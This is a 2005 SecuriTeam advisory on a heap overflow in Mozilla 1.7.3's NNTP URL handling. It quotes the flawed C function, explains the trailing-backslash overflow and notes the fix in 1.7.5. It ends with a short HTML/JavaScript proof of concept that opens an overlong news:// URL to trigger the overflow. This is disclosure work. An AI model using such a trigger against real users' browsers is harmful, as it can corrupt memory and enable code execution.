Date: 2 Jan 2005 17:06:08 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]Subject: [UNIX] Mozilla Browser NNTP Heap Overflow
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Mozilla Browser NNTP Heap Overflow
------------------------------------------------------------------------
SUMMARY
A critical security vulnerability has been found in Mozilla Project code
handling NNTP protocol.
DETAILS
Vulnerable Systems:
* Mozilla Browser version 1.7.3 and prior with mozilla-mail
Immune Systems:
* Mozilla Browser version 1.7.5 or newer
Mozilla browser supports NNTP URLs. Remote side is able to trigger
news:// connection to any server. Maurycy found a flaw in NNTP handling
code which may cause heap overflow and allow remote attacker to execute
arbitrary code on client machine.
Bugus function from nsNNTPProtocol.cpp:
char *MSG_UnEscapeSearchUrl (const char *commandSpecificData)
329 {
330 char *result = (char*) PR_Malloc (PL_strlen(commandSpecificData) +
1);
331 if (result)
332 {
333 char *resultPtr = result;
334 while (1)
335 {
336 char ch = *commandSpecificData++;
337 if (!ch)
338 break;
339 if (ch == '\\')
340 {
341 char scratchBuf[3];
342 scratchBuf[0] = (char) *commandSpecificData++;
343 scratchBuf[1] = (char) *commandSpecificData++;
344 scratchBuf[2] = '\0';
345 int accum = 0;
346 PR_sscanf(scratchBuf, "%X", &accum);
347 *resultPtr++ = (char) accum;
348 }
349 else
350 *resultPtr++ = ch;
351 }
352 *resultPtr = '\0';
353 }
354 return result;
355 }
When commandSpecificData points to last (next is NULL) character which is
'\\' copying loop may omit termination of source char array and overflow
result buffer.
Solution:
This bug is fixed in Mozilla 1.7.5. (Bug 264388) Mozilla developer Dan
Veditz claims that it cannot be exploitable: "A '\' on the end will
certainly trash memory, but at that point you're no longer reading
attacker-supplied data;".
On my RedHat 9.0 with Mozilla 1.7.3 attached proof of concept code
overflows the buffer using attacker-supplied data. I decided to make this
bug public because Mozilla Team hasn't warned users.
Proof of concept:
< html>
< script>
i = "news://news.individual.net/AAAAAAAAAAAAAA?";
for(l = 0; l < 16376; l++)
i=i+"A";
i=i+"/?profile/";
for(l = 0; l < 16384; l++)
i=i+"A";
i=i+"\\";
window.open(i);
</script>
</html>
ADDITIONAL INFORMATION
The information has been provided by <mailto:z33d@isec.pl.> Maurycy
Prodeus.
The original article can be found at:
<http://isec.pl/vulnerabilities/isec-0020-mozilla.txt>
http://isec.pl/vulnerabilities/isec-0020-mozilla.txt
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.